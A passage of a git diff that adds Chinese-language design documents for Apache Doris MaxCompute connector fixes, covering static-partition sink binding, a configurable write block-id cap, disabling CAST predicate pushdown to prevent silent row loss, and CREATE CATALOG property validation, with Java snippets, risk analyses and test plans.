P0-2(committed)**:用户已批准。capability 门保留→JDBC/ES 不受影响;纯动态 cols==fullSchema→行为不变;只有 partial-static 的索引行为改变(修复,非回归)。P0-2 测试随改。 +- **R2 复用 `getColumnToOutput` 的 OLAP 包袱**:OLAP 分支 `instanceof OlapTable` 守门惰性;`isPartialUpdate=false`;外表无 generated/mv/shadow 列、循环空转。legacy MC 已长期复用证其对外表安全。 +- **R3 分区列可空性**:两路均 `isAllowNull/isNullable=true`(已核),NullLiteral 填充不抛。 +- **R4 BE partial-static 末尾擦除 region**:BE 对 partial-static 擦全部分区列、按静态 spec 路由——此为 **legacy 既有行为**(本 fix 不改 BE,parity 保持);其端到端正确性属 live-e2e 门 + 既有 legacy 限制,**不在本 fix scope**(若 BE 实有 partial-static 数据落位问题,legacy 同存,另立 ticket)。 +- **R5 e2e 未验**:CI 无 live ODPS。本 fix 静态层 parity 高置信,但写路径最终须 `test_mc_write_static_partitions.groovy` live 验(与 P0-1/P0-2 一并)。**真值闸**:all-static / partial-static / 纯动态 INSERT(+VALUES) 无 "writer has been closed" 且数据落对分区。 + +--- + +## Test Plan + +### Unit Tests(fe-core,无 e2e) + +- **`BindConnectorSinkStaticPartitionTest`(新)** — pin bind 期列过滤(Rule 9:静态分区列必须从 cols 排除否则列数校验抛/写丢列)。因 `bind()` 走真实 Env 解析较重,采 `PhysicalConnectorTableSinkTest` 同款 mock:mock `PluginDrivenExternalTable`(stub `getBaseSchema(true)`/`getColumn`/`getPartitionColumns`/`getFullSchema`),驱动列选择逻辑(必要时抽 `@VisibleForTesting` 包级静态 helper `selectConnectorBindColumns(table, colNames, staticPartitionColNames)`),断言: + - all-static 无列名 `{pt}` → bindColumns = 数据列(排除 pt)。 + - 纯动态 无静态 spec → bindColumns = full base schema(不排除)。 + - 显式列名 → 用户列(不受影响)。 + - **mutation**:删 `.filter(...)` → all-static 断言含 pt → 红。 +- **`PhysicalConnectorTableSinkTest`(改)** — 见改动 4,新增 partial-static 用例 pin full-schema 索引。 + - **mutation**:full-schema 索引改回 cols 索引 → partial-static 用例红。 + +### E2E Tests + +复用既有 `regression-test/suites/external_table_p2/maxcompute/write/test_mc_write_static_partitions.groovy`(p2 / live ODPS / CI 跳):all-static(无 SORT)、partial-static(有 SORT)、纯动态、VALUES 形式、INSERT OVERWRITE。**作为 live 真值闸记录**,本轮不在 CI 跑。 + +--- + +## review 轮次累计结论(防跨轮矛盾) + +> 详见 `plan-doc/reviews/P4-T06e-FIX-BIND-STATIC-PARTITION-review-rounds.md`。3 轮 clean-room 对抗 review 收敛(0 mustFix)。 + +- **判别键三轮收敛**:`!staticPartitionColNames.isEmpty()`(R1 证伪:纯动态重排显式列名错列)→ `!getPartitionColumns().isEmpty()`(R2 证伪:非分区 MaxCompute 重排/部分列名静默错列/丢列,因 MC BE 按位置写)→ **`table.requiresFullSchemaWriteOrder()`**(capability `SINK_REQUIRE_FULL_SCHEMA_ORDER`)。终态 = MaxCompute 全写形与 legacy `bindMaxComputeTableSink` 逐字 parity;JDBC/ES cols 序 parity。〔本文上方「Design 改动 1」分支键 `!staticPartitionColNames.isEmpty()` 与「改动 2 partitioned」均为中间态,**已被 capability 取代**——以 review-rounds R2/R3 + 代码为准。〕 +- **R1(`wi3mnjymb`)**:13→8 confirmed(3 major 同根因 = 投影分支太窄 + 分布 full-schema 索引不匹配 cols 序 child)。修:分支改 partitioned + 分布回退 full-schema 索引 + 新增 reordered-dynamic 分布测。 +- **R2(`wy299gtsh`)**:1 new major(非分区 MC 重排/部分列名)。修:分支 partitioned→capability;新增 SPI `SINK_REQUIRE_FULL_SCHEMA_ORDER`;p2 `test_mc_write_insert` Test 3b。 +- **R3(`wlwpw0b2s`)**:0 mustFix 收敛。1 nit(跨 capability 隐式耦合 LOCAL_SORT⟹FULL_SCHEMA_ORDER)→ javadoc 登记。确认全 connector/写形 legacy parity。 +- **登记**:[D-030](capability + 回退 D-029 索引)、[DV-014](bind 投影单测 KNOWN-LIMITATION)。**Batch-D 红线**:删 legacy `bindMaxComputeTableSink`/`PhysicalMaxComputeTableSink` 须待本 fix 落(已落)。 +- **真值闸**:live e2e(p2 `test_mc_write_insert` Test 3/3b + `test_mc_write_static_partitions`:all-static/partial-static/纯动态/重排/部分/VALUES 无 "writer has been closed" 且数据落对列/分区)。 diff --git a/plan-doc/tasks/designs/P4-T06e-FIX-BLOCKID-CAP-CONFIG-design.md b/plan-doc/tasks/designs/P4-T06e-FIX-BLOCKID-CAP-CONFIG-design.md new file mode 100644 index 00000000000000..0f2da414e1001a --- /dev/null +++ b/plan-doc/tasks/designs/P4-T06e-FIX-BLOCKID-CAP-CONFIG-design.md @@ -0,0 +1,149 @@ +# [P4-T06e] FIX-BLOCKID-CAP-CONFIG (CRITICGAP1) — design + +> 来源:Batch-D 红线扩充对抗复审 workflow `wbw4xszrg`(CRITICGAP1,Tier 2,minor,写路径)。 +> 关联:legacy `MCTransaction.allocateBlockIdRange:165`(读可调 `Config.max_compute_write_max_block_count`);`Config.java:2156`(`= 20000L`,fe.conf 可调);既有偏差 `deviations-log.md` **DV-011**(P4-T03 把上限硬编为连接器常量、自承「丢 fe.conf 可调性,如需再经透传暴露」)。 +> 用户定夺(2026-06-08):**Option A — 全局 Config 透传**(true legacy parity,反转 DV-011 的 Rule-2 推迟决定)。 + +## Problem + +翻闸后,写 block-id 分配上限**硬编**为连接器常量 `MAX_BLOCK_COUNT = 20000L` +(`MaxComputeConnectorTransaction.java:72`,用于 `:146` 的越限校验),无视 legacy +`MCTransaction.allocateBlockIdRange:165` 读取的**可调** `Config.max_compute_write_max_block_count` +(`Config.java:2156`,fe.conf 可调、默认 20000)。 + +后果:**调优部署静默回归**。管理员若在 fe.conf 把 `max_compute_write_max_block_count` 调离默认值: +- 调高(如 50000,为大写入放宽)→ 连接器仍在 20000 处拒绝 → legacy 能成功的大写入在翻闸后失败。 +- 调低(如 10000,为限流)→ 连接器仍允许到 20000 → 比管理员意图更宽松。 + +20000 = 默认值,故仅**改过 fe.conf 的部署**受影响(窄但真实的 parity 回归)。 + +## Root Cause(已核码确认) + +| # | 位置 | 现状 | legacy parity | +|---|---|---|---| +| 1 | `MaxComputeConnectorTransaction.java:72` | `private static final long MAX_BLOCK_COUNT = 20000L;`(硬编、用于 `:146`) | legacy `MCTransaction:165` 读 `Config.max_compute_write_max_block_count`(可调) | +| 2 | 连接器 import-gate | 禁 `org.apache.doris.common.Config` → 无法直接读 fe Config | legacy 在 fe-core、可直接 import `Config` | + +**核心约束**:连接器禁 import fe-core(含 `Config`),故不能像 legacy 那样直接读。须经**透传通道**把 FE 全局 Config 值送到连接器。 +`max_compute_write_max_block_count` 是 **FE 全局 Config**(`Config.java:2156`),**非** SessionVariable(`SessionVariable.java` 无此名)、**非** catalog property。 + +**为何 CI 没抓**:`MaxComputeConnectorTransaction` 当前**无任何单测**;cap 行为从未被 pin;DV-011 把硬编登记为「已接受偏差」。 + +## 透传通道调研(已核码) + +`ConnectorSession` 三通道:`getSessionProperties()`(=session 变量,`VariableMgr.toMap`)/ `getCatalogProperties()`(=CREATE CATALOG 属性)/ `getProperty()`。**三者皆不天然携带 FE 全局 Config。** + +**但有直接先例**:`ConnectorSessionBuilder.extractSessionProperties:115-120`(fe-core,可 import `Config`)已把一个**非-session-变量的 server 全局** `GlobalVariable.lowerCaseTableNames` 显式 `props.put` 进 session-properties map: +```java +Map props = VariableMgr.toMap(ctx.getSessionVariable()); +props.put("lower_case_table_names", String.valueOf(GlobalVariable.lowerCaseTableNames)); // ← 先例 +return props; +``` +连接器读 session 变量的既有约定见 P3-9(`MaxComputeScanPlanProvider` 的 `ENABLE_MC_LIMIT_SPLIT_OPTIMIZATION`:连接器内重复字面 key 常量 + 注「禁依赖 fe-core 常量、须 byte-identical」+ map-typed 可测 parse 方法)。 + +事务构造点 `MaxComputeConnectorMetadata.beginTransaction:357-359` **持有 `session`**(唯一 `new MaxComputeConnectorTransaction` 处),故连接器可在此读注入值并传入 ctor。 + +## Design(Option A:全局 Config 透传,true parity) + +**Shape:fe-core 1 行注入(镜像 lower_case_table_names)+ 连接器 ctor 透传。无 SPI 签名变更。import-gate 净(连接器不 import Config,只读 session map)。** + +### 改 1(fe-core):`ConnectorSessionBuilder.java` + +- 加 `import org.apache.doris.common.Config;` +- `extractSessionProperties` 在 `lower_case_table_names` 之后加(逐字镜像该先例): + ```java + // MaxCompute write block-id cap: the connector cannot import fe-core Config, so the tunable + // Config.max_compute_write_max_block_count is surfaced through this channel (same as + // lower_case_table_names) and read back via ConnectorSession.getSessionProperties(). + // Key must stay byte-identical to MaxComputeConnectorMetadata.MAX_COMPUTE_WRITE_MAX_BLOCK_COUNT. + props.put("max_compute_write_max_block_count", + String.valueOf(Config.max_compute_write_max_block_count)); + ``` + 注入值恒为合法 long(Config 字段是 `long`)。 + +### 改 2(连接器):`MaxComputeConnectorTransaction.java` + +- `MAX_BLOCK_COUNT` 常量 → 实例字段 + 默认常量: + ```java + /** Legacy default of Config.max_compute_write_max_block_count; fallback when the + * session does not carry the (tunable) value. */ + static final long DEFAULT_MAX_BLOCK_COUNT = 20000L; + + private final long maxBlockCount; + ``` +- ctor 加 `long maxBlockCount` 参(唯一 caller = beginTransaction): + ```java + public MaxComputeConnectorTransaction(long transactionId, long maxBlockCount) { + this.transactionId = transactionId; + this.maxBlockCount = maxBlockCount; + } + ``` +- `:146` 越限校验 `MAX_BLOCK_COUNT` → `maxBlockCount`(含异常 message)。 + +### 改 3(连接器):`MaxComputeConnectorMetadata.java` + +- 加 key 常量(byte-identical to fe-core,注同 P3-9)+ map-typed 可测 resolve: + ```java + // Must stay byte-identical to the key ConnectorSessionBuilder.extractSessionProperties injects. + private static final String MAX_COMPUTE_WRITE_MAX_BLOCK_COUNT = "max_compute_write_max_block_count"; + + static long resolveMaxBlockCount(Map sessionProperties) { + String v = sessionProperties.get(MAX_COMPUTE_WRITE_MAX_BLOCK_COUNT); + if (v == null) { + return MaxComputeConnectorTransaction.DEFAULT_MAX_BLOCK_COUNT; + } + try { + return Long.parseLong(v.trim()); + } catch (NumberFormatException e) { + return MaxComputeConnectorTransaction.DEFAULT_MAX_BLOCK_COUNT; + } + } + ``` +- `beginTransaction`: + ```java + long maxBlockCount = resolveMaxBlockCount(session.getSessionProperties()); + return new MaxComputeConnectorTransaction(session.allocateTransactionId(), maxBlockCount); + ``` + +**契约**:live 路径 `from(ctx)` 必注入合法 long → 连接器读到调优值 = legacy parity。任何缺/坏值 → fallback 20000 = **当前行为,零回归**(replay/无 ctx 等边路安全)。 + +## Risk Analysis + +- **无注入的边路**(如某 transaction 不经 `from(ctx)` 建的 session):`getSessionProperties()` 默认空 map → resolve 返 20000 = 现状。✅ 无新回归面。 +- **读时机**:在 `beginTransaction` 读一次、存入 transaction 实例(block 分配在写执行期由 BE 回调)。legacy 在分配时直读 Config;二者仅在「管理员写中途改 fe.conf」时有别(可忽略)。✅ +- **key typo 风险**(最关键):fe-core 注入 key 与连接器读取 key 须 byte-identical,否则连接器永远读不到 → 静默 fallback 20000 → 回归仍在但更隐蔽。缓解 = 双侧交叉引用注释(同 P3-9 `ENABLE_MC_LIMIT_SPLIT_OPTIMIZATION` 约定)+ key 取 Config 字段名自身(自文档)。⚠️ 见 Test Plan 测试缺口说明。 +- **import-gate / SPI**:连接器零新增 fe-core import(只读 session map);无 SPI 签名变更。fe-core 加 `Config` import(fe-core 本就依赖 fe-common)。✅ +- **DV-011 反转**:本修反转 DV-011 的 Rule-2 推迟(用户定 Option A)。DV-011 须更新为「已修正(GC1,经 session-property 透传)」。 + +## Test Plan + +### Unit Tests + +**连接器(行为所在,fe-core-free / mockito-free):** + +1. **新增 `MaxComputeConnectorTransactionTest`**(Rule 9 — pin「cap 可配置且被强制」): + - 用小 cap(如 `maxBlockCount=5`)构造 + `setWriteSession` → `allocateWriteBlockRange` 在 cap 内 OK、越 cap 抛 `DorisConnectorException`(断言 message 含 maxBlockCount)。 + - 用**不同** cap(如 3 vs 10)证上限确随 ctor 参变化(非硬编 20000)。 +2. **`resolveMaxBlockCount(Map)` parse 测**(加入连接器某 metadata test 或新 transaction test):present 合法值→解析;absent→`DEFAULT_MAX_BLOCK_COUNT`(20000);unparseable→20000。 + +> mutation:`resolveMaxBlockCount` 改为「忽略 prop、恒返 DEFAULT」→ 「不同 cap」/「present 值解析」test 向红;还原绿。另可把 `:146` 的 `maxBlockCount` 改回硬编 → transaction cap 测向红。 + +**fe-core(注入侧)— 测试缺口如实登记(Rule 12):** + +- `extractSessionProperties` 是 private、`from(ctx)` 需重型 `ConnectContext`,且**先例 `lower_case_table_names` 注入本身无专门 builder 单测**(仅被 datasource/lowercase 集成测间接覆盖)。 +- 故 fe-core 注入侧**不加专门单测**(与既有约定一致),由**编译** + **连接器侧行为测** + **双侧 byte-identical key 注释**(同 P3-9)保证。 +- 若实现时发现 `ConnectorSessionBuilder.from(new ConnectContext())` 可廉价构造并断言 key 注入,则**加一条** fe-core 测以闭 key-typo 风险;否则依约定。**实现时定夺并在 summary 记结果。** + +### E2E / live(真实 ODPS,CI 跳,登记 DV) + +- live:fe.conf 设 `max_compute_write_max_block_count` 为小值(如 3)→ 大写入触发越限抛错;设大值→放宽。证连接器尊重 fe.conf(= legacy parity)。归入 DV(写路径真值闸,CI 跳)。 + +## 实现清单 + +1. `ConnectorSessionBuilder.java`:+import Config + 1 行 `props.put`。 +2. `MaxComputeConnectorTransaction.java`:常量→字段 + ctor 加参 + `:146` 用字段 + `DEFAULT_MAX_BLOCK_COUNT`。 +3. `MaxComputeConnectorMetadata.java`:key 常量 + `resolveMaxBlockCount` + `beginTransaction` 透传。 +4. 测:新 `MaxComputeConnectorTransactionTest` + resolve parse 测(+ 可选 fe-core 注入测)。 +5. 守门:编译(fe-core + 连接器)+ UT + checkstyle(fe-core + 连接器)+ import-gate + mutation。 +6. 单 Agent 对抗 impl-review。 +7. 独立 `[P4-T06e]` commit + hash 回填 + tracker(GC1 行)+ **更新 DV-011(已修正)**。 diff --git a/plan-doc/tasks/designs/P4-T06e-FIX-CAST-PUSHDOWN-design.md b/plan-doc/tasks/designs/P4-T06e-FIX-CAST-PUSHDOWN-design.md new file mode 100644 index 00000000000000..20023cbe68a979 --- /dev/null +++ b/plan-doc/tasks/designs/P4-T06e-FIX-CAST-PUSHDOWN-design.md @@ -0,0 +1,109 @@ +# FIX-CAST-PUSHDOWN 设计(F9 / READ-C6) + +> 严重度:🔴 **major / correctness — 静默数据丢失回归**(review 原误判为「known-degradation / 已登记」,本复查推翻)。 +> 用户拍板(2026-06-08):**Fix(MaxCompute override `supportsCastPredicatePushdown=false`)+ 顺手深查受影响类型对**。 +> 来源:`plan-doc/reviews/P4-maxcompute-full-rereview-2026-06-07.md` F9(confirms 3/3)/ `P4-cutover-review-findings.md` READ-C6。 +> 对抗核验:workflow `wzoa6dkvw`(establish + 3 skeptic refute,**0/3 refuted、verdict=real-unregistered-regression**)。 +> **状态:✅ DONE @`cc32521ed99`**(impl-review `wj2h0120n` 1 shouldFix→折入;[D-036]/[DV-020])。账本回填见下一 doc-sync commit。 + +## Problem + +查询 MaxCompute 外表时,`WHERE` 含**隐式类型转换**(implicit CAST)的谓词会被**剥壳下推到 ODPS**, +导致**静默少返回行**(错误结果、无报错)。例:STRING 列 `code` 存 `"5"/"05"/" 5"`(数值皆 5): + +```sql +SELECT * FROM mc_tbl WHERE CAST(code AS INT) = 5; +``` +- 正确(= legacy):3 行全返回;cutover:**只返 `"5"`,`"05"/" 5"` 静默丢失**。 + +## Root Cause(已核源) + +1. fe-core 共享 converter 无条件剥 CAST:`ExprToConnectorExpressionConverter.java:108` + (`else if (expr instanceof CastExpr) return convert(expr.getChild(0));`)→ `CAST(code AS INT)=5` 变 `code=5`。 +2. `PluginDrivenScanNode.buildRemainingFilter:779` 仅当 `!supportsCastPredicatePushdown` 才剔除含 CAST 的 conjunct; + **MaxCompute 不 override,继承 `ConnectorPushdownOps:72` 默认 `true`** → 剥壳后的谓词**不被剔除**、流入 `planScan`。 +3. 连接器侧 `MaxComputePredicateConverter.formatLiteralValue:219-222` 按**列**的 ODPS 类型 quote literal + → STRING 列得到源端过滤 `code = "5"`;`MaxComputeScanPlanProvider:309 withFilterPredicate` 推入 read session。 +4. ODPS 在**读取时**过滤掉 `"05"/" 5"`(源端 under-match)→ 这些行**从未读回**。 +5. BE 仍保留原 conjunct 复算(MC 不 override `applyFilter`,`convertPredicate:330` `result` 空、conjunct 不清; + MC 无 conjunct tracking、`pruneConjunctsFromNodeProperties` 早退)——**但 BE 复算只能把 ODPS 返回的超集再过滤*下*, + 无法找回源端已丢的行**。BE backstop 仅救 over-match、不救 under-match。 + +**为何 legacy 无此问题(→ 这是回归)**:legacy `MaxComputeScanNode.convertSlotRefToColumnName:477` 对非-`SlotRef` +操作数(即 `CastExpr`)**抛 `AnalysisException`** → `convertPredicate:308-313` try/catch **吞掉、丢弃该谓词**(不下推) +→ ODPS 返回全集、BE 复算正确。cutover 比 legacy **严格更紧** → 静默丢行。 + +## Design + +**最小连接器局部修复 = MaxCompute override `supportsCastPredicatePushdown(session) → false`**(镜像 `JdbcConnectorMetadata:222` +的能力门 + `ConnectorPushdownOps:64-70` doc 明示的「coercion 规则不同的连接器应置 false」处方)。 +激活**既有** strip 路径(`PluginDrivenScanNode:779-787`):含 CAST 的 conjunct 在下推前被剔除、保留 BE-only, +ODPS 返回全集、BE 复算正确——**恢复 legacy parity、消除数据丢失**。**无新代码路径。** + +## 受影响类型对深查(用户要求;fix 为全覆盖,本节为动机/测试文档) + +> 关键:本 fix **剔除所有含 CAST 的 conjunct**(`containsCastExpr` 查整树),故**不需精确枚举即安全**—— +> 任何 Doris CAST 语义 ≠ ODPS 隐式 coercion 的对都被一网打尽。下列为代表性 under-match 风险对: + +| 谓词形 | Doris 语义 | cutover 推下的 ODPS 源过滤 | under-match 风险 | +|---|---|---|---| +| STRING 列 vs 数值字面量(`CAST(s AS INT)=5`、`s IN (1,2)`) | 数值相等(`"05"`=5) | `s = "5"`(按列 STRING quote) | **高**(确认):丢 `"05"/" 5"/"+5"/"5.0"` | +| 数值列 vs 字符串字面量(`CAST(n AS STRING)='5'`) | 字符串相等 | `n = 5`(按列数值) | 中:ODPS 数值比较 vs Doris 串比较,边界/前导零差异 | +| DATE/DATETIME vs STRING(`CAST(d AS STRING)='2024-01-01'`) | 串格式相等 | 按列 DATE quote,格式/时区 coercion 差 | 中:格式串差异致丢行 | +| DECIMAL/精度(`CAST(dec AS INT)=5`、float↔decimal) | 截断/舍入后比较 | 按列精度比较 | 中:精度/舍入语义差 | +| CHAR 定长 padding(`CAST(c AS ...)`) | trim/pad 语义 | 按列 CHAR 比较 | 低-中 | + +各对的**确切** under-match 取决于 ODPS 运行时 coercion(代码层不可完全枚举),但 fix 对全部 CAST 谓词一律剔除下推, +故覆盖完整,无需逐一证实。**等值/`IN` 最清晰;范围比较(`>/=/<=`)同理**(剥壳后边界 coercion 差亦 under-match)。 + +## Risk Analysis + +- **性能(可接受、= legacy parity)**:CAST 谓词不再下推 ODPS → 该谓词不再窄化源端扫描、多读些行交 BE 复算。 + 与 legacy 行为一致(legacy 本就丢弃 CAST 谓词下推)。correctness > 这点丢失的下推优化。 +- **limit-opt 交互(更保守、安全)**:含 CAST 的分区等值谓词不再进 pushed filter → `shouldUseLimitOptimization` + 的 `checkOnlyPartitionEquality` 对其判不资格 → limit-opt 更保守触发(少触发非误触发,无正确性损失)。 +- **分区裁剪不受影响**:Nereids `PruneFileScanPartition` 用原始 Doris Expr 独立算 `SelectedPartitions`, + 不经 `supportsCastPredicatePushdown`、不经 connector converter → 裁剪照常。 +- **其余连接器零影响**:仅 MaxCompute override;jdbc(session-gated true)/es/hive/paimon/hudi/trino 不变。 +- **无 SPI 变更**:`supportsCastPredicatePushdown` 已是 SPI 既有方法、strip 路径已存在。 + +## Test Plan + +### Unit(offline) +- `MaxComputeConnectorMetadataCapabilityTest` 加 `maxComputeDisablesCastPredicatePushdown`: + `new MaxComputeConnectorMetadata(null,null,"proj","ep","quota",emptyMap()).supportsCastPredicatePushdown(null)` == **false** + (getter 不碰实例字段,offline;mirror 既有 `maxComputeDeclaresSupportsCreateDatabase` + JDBC `JdbcConnectorMetadataTest:106`)。 + **WHY**:flip 回 true(或删 override 回默认 true)→ 重新打开 CAST 下推 → 数据丢失回归。mutation:override `false→true` 该测变红。 +- buildRemainingFilter 的 strip-when-false 行为是 fe-core 共享逻辑,已被既有路径(JDBC false 分支)覆盖; + 其对 MC 节点的端到端 wiring 受同类 harness 缺位限制(同 [DV-015]),由 live e2e 守(见下)。 + +### E2E(CI-skip,真值闸) +- live ODPS:STRING 列存 `"5"/"05"/" 5"`,`SELECT ... WHERE CAST(code AS INT)=5` 返回**全部** 3 行(修前只 1 行); + EXPLAIN 证 CAST 谓词不在下推 filter、留 BE。归 DV(CAST-pushdown 数据丢失修复真值闸)。 + +## Implementation Plan +1. `MaxComputeConnectorMetadata` 加 `@Override supportsCastPredicatePushdown(session)→false`(带 WHY 注释引 F9/legacy parity)。 +2. `MaxComputeConnectorMetadataCapabilityTest` 加测 + mutation。 +3. 守门:连接器 compile BUILD SUCCESS、UT、checkstyle 0、import-gate 净、mutation(false→true 变红)。 +4. impl-review workflow 收敛。 +5. 独立 commit(fix)+ commit(hash 回填);D-036 + 必要时 DV;**更正 review F9 定级**(known-degr→regression)+ task-list/HANDOFF。 + +## impl-review(clean-room,workflow `wj2h0120n`,2 lens + verify)—— 收敛 1 shouldFix + +**GO-WITH-EDITS:1 shouldFix(2/2 confirmed)+ 3 rejected,已折入**: +- **F9-LIMITOPT-1(shouldFix)**:`supportsCastPredicatePushdown=false` 在 fe-core 剥 CAST conjunct → 连接器收到**空 filter** → + 当 `enable_mc_limit_split_optimization=ON` 且 query 唯一谓词是 CAST(`WHERE CAST(nonpart)=5 LIMIT 10`)时, + `MaxComputeScanPlanProvider.shouldUseLimitOptimization` 的 `!filter.isPresent()→true` 分支触发 → row-offset 读首 N 行**无谓词** → + BE 复算 CAST 于首 N 行 → **under-return**。legacy `checkOnlyPartitionEqualityPredicate` 读**原始** conjuncts、CAST child 非 SlotRef→false→limit-opt 关→正确。 + **故仅 override 会把 bug 从「pushdown 丢行」移成「limit-opt 丢行」(仅 limit-opt ON 时,默认 OFF)。** +- **修(折入本 commit,连接器无关、更通用)**:fe-core `getSplits` 在 `filteredToOriginalIndex != null`(CAST conjunct 被剥)时 + **抑制 source-side LIMIT 下推**(抽纯静态 `effectiveSourceLimit(limit, stripped)→stripped?-1:limit`)。limit-opt 需 `limit>0`, + 传 -1 即不触发;BE 仍应用 LIMIT。原则普适(剥了 BE-only 谓词就不能让 source 先 LIMIT),`startSplit` 批路径已恒传 -1(DEC-1)故只改 `getSplits`。 +- **守门补**:fe-core LimitStripTest 2/2 + BatchMode 9/9、mutation 2/2 向红(drop-suppression / always-suppress)。 +- **out-of-scope 跟进(Rule 12 surface)**:JDBC 若 session 关 cast-pushdown 且经 `applyLimit` 推 limit,理论同类 under-return; + 但 MaxCompute 不 override `applyLimit`(no-op),F9 的 getSplits limit-param 抑制对 MaxCompute 完整;JDBC `applyLimit` 路径**非本修范围**(pre-existing、非 MC),登记备查。 + +## 关联 +- 决策 [D-036](待);复查证据 workflow `wzoa6dkvw` +- 复审 [F9 / READ-C6](../../reviews/P4-maxcompute-full-rereview-2026-06-07.md);区别于 [DV-016](CAST-unwrap 仅 limit-opt 资格、非丢行) +- 参照 `JdbcConnectorMetadata:222`(同能力门)、`ConnectorPushdownOps:64-74`(SPI doc 处方) diff --git a/plan-doc/tasks/designs/P4-T06e-FIX-CREATE-CATALOG-VALIDATION-design.md b/plan-doc/tasks/designs/P4-T06e-FIX-CREATE-CATALOG-VALIDATION-design.md new file mode 100644 index 00000000000000..36e9bbe7b4a032 --- /dev/null +++ b/plan-doc/tasks/designs/P4-T06e-FIX-CREATE-CATALOG-VALIDATION-design.md @@ -0,0 +1,186 @@ +# [P4-T06e] FIX-CREATE-CATALOG-VALIDATION (GAP6) — design + +> 来源:Batch-D 红线扩充对抗复审 workflow `wbw4xszrg`(GAP6,Tier 2,major)。用户定 **Fix**(2026-06-08 批量 G6+G5+G7)。 +> 关联:legacy 对照 `MaxComputeExternalCatalog.checkProperties:388-457`;SPI 钩子 `ConnectorProvider.validateProperties`(no-op 默认 :74-76);wiring `PluginDrivenExternalCatalog.checkProperties:153-165` → `ConnectorFactory.validateProperties:97-103` → `ConnectorPluginManager.validateProperties:161-174` → `provider.validateProperties`。 +> 同侧参照:`JdbcConnectorProvider.validateProperties:50-112`(已 override,本设计逐式镜像其风格:本地 `REQUIRED_PROPERTIES` + `IllegalArgumentException` + 私有 helper)。 + +## Problem + +翻闸后,CREATE CATALOG 对 max_compute 的**属性校验全部缺失**。`MaxComputeConnectorProvider`(连接器 SPI 入口)只 override `getType()`/`create()`,**未 override `validateProperties`** → 继承 SPI no-op 默认(`ConnectorProvider:74-76`,「all properties accepted」)。其余翻闸连接器(jdbc/es/trino)均已 override。 + +后果(对照 legacy `checkProperties` 在 CREATE 时的六类校验): +- **required PROJECT / ENDPOINT 缺失**:CREATE 接受 → 退化为首次使用时 `MaxComputeDorisConnector.doInit()`(懒初始化)才以 `defaultProject=null` / `resolveEndpoint=null` 晚失败,错误信息晦涩、远离 CREATE 现场。 +- **account_format 非法值**(如 `'foo'`):`doInit:98-107` **静默 coerce 为 DISPLAYNAME**(`else` 分支),用户的非法配置被悄悄吞掉。 +- **connect/read timeout、retry_count ≤ 0 或非整数**:`buildSettings:131-139` 用 `Integer.parseInt` 在**首次使用**才解析、且**无 >0 校验** → 负值被静默接受(传给 ODPS RestOptions,行为未定);非整数抛 `NumberFormatException`(use-time,非 create-time)。 +- **split_strategy 非 byte_size/row_count、split_byte_size < 10485760 floor、split_row_count ≤ 0**:连接器侧根本不校验(split 参数在 scan provider 消费)。 +- **auth 属性不完整**(如 ak_sk 缺 access_key/secret_key):`MCConnectorClientFactory.checkAuthProperties:42-78` **已定义但零调用方**(dead code)→ CREATE 时不查,运行时建客户端才可能晚失败。 + +净效果:非法 catalog 在 CREATE 时被接受(fail-late 或 silently-accept-illegal),违反 legacy「create 即校验、fail-fast」契约。 + +## Root Cause(已核码确认) + +| # | 位置 | 现状 | legacy parity 源 | +|---|---|---|---| +| 1 | `MaxComputeConnectorProvider:29-41` | 仅 `getType`/`create`,无 `validateProperties` override → 继承 no-op | `MaxComputeExternalCatalog.checkProperties:388-457`(override,6 类校验,throws DdlException) | +| 2 | `MCConnectorClientFactory.checkAuthProperties:42-78` | 定义完整但 **grep 全 repo 零调用方**(dead) | legacy 经 `MCUtils.checkAuthProperties(props)`(`checkProperties:456`)调用 | +| 3 | `MaxComputeDorisConnector.doInit:98-107` | account_format 非法值静默→DISPLAYNAME | legacy `checkProperties:423-430` 非法→`throw DdlException("...only support name and id")` | +| 4 | `MaxComputeDorisConnector.buildSettings:131-139` | timeout/retry 仅 parseInt、无 >0 校验、且 use-time | legacy `checkProperties:439-449` 各 >0、create-time | + +**wiring 已就绪**(无需改):`PluginDrivenExternalCatalog.checkProperties:153-165`(CREATE CATALOG 校验钩子,先 `super.checkProperties()` 再)调 `ConnectorFactory.validateProperties` 且 **`catch (IllegalArgumentException e) → throw new DdlException(e.getMessage())`**(:159-160)。即:本 override 抛 `IllegalArgumentException` → 包成 `DdlException` → 用户看到的错误形态**与 legacy(直接抛 DdlException)一致**。 + +**为何 CI 没抓**:连接器 provider 无 `validateProperties` 的任何 UT(grep 无 `MaxComputeConnectorProviderTest`);live e2e 未覆盖非法属性 CREATE。 + +## Blast radius + +- 改动集中在连接器模块 `fe-connector-maxcompute`:`MaxComputeConnectorProvider`(加 override + 私有 helper)+ `MCConnectorClientFactory.checkAuthProperties`(异常类型对齐,见下)。**无 SPI 签名变更**(`validateProperties` 钩子早已存在)。 +- `validateProperties` 仅在 CREATE CATALOG / ALTER CATALOG 属性校验路径被调(`checkProperties`),**不在 replay**(持久化老 catalog 从 image 重建、不重跑 create 校验)→ 老 catalog(含 region/odps_endpoint 式)不受影响。 +- import-gate 净:仅用连接器内 `MCConnectorProperties` / `MCConnectorClientFactory` + `java.lang.IllegalArgumentException`,不 import fe-core(`org.apache.doris.{catalog,common,datasource,...}`)。 +- 对其余连接器(jdbc/es/trino/hive…)零影响(各自 provider 独立)。 + +## Design + +**Shape:连接器局部,无 SPI 变更** —— `MaxComputeConnectorProvider` override `validateProperties`,逐项镜像 legacy `checkProperties` 的六类校验,抛 `IllegalArgumentException`;wire 既有 dead `checkAuthProperties`。 + +### 六类校验(逐字镜像 legacy `checkProperties:388-457`) + +```java +private static final List REQUIRED_PROPERTIES = Arrays.asList( + MCConnectorProperties.PROJECT, + MCConnectorProperties.ENDPOINT); + +@Override +public void validateProperties(Map properties) { + // 1. required: PROJECT + ENDPOINT(字面 key,镜像 legacy REQUIRED_PROPERTIES) + for (String required : REQUIRED_PROPERTIES) { + if (!properties.containsKey(required)) { + throw new IllegalArgumentException("Required property '" + required + "' is missing"); + } + } + + // 2. split strategy + floor(镜像 legacy :397-412) + String splitStrategy = properties.getOrDefault( + MCConnectorProperties.SPLIT_STRATEGY, MCConnectorProperties.DEFAULT_SPLIT_STRATEGY); + try { + if (splitStrategy.equals(MCConnectorProperties.SPLIT_BY_BYTE_SIZE_STRATEGY)) { + long splitByteSize = Long.parseLong(properties.getOrDefault( + MCConnectorProperties.SPLIT_BYTE_SIZE, MCConnectorProperties.DEFAULT_SPLIT_BYTE_SIZE)); + if (splitByteSize < 10485760L) { + throw new IllegalArgumentException( + MCConnectorProperties.SPLIT_BYTE_SIZE + " must be greater than or equal to 10485760"); + } 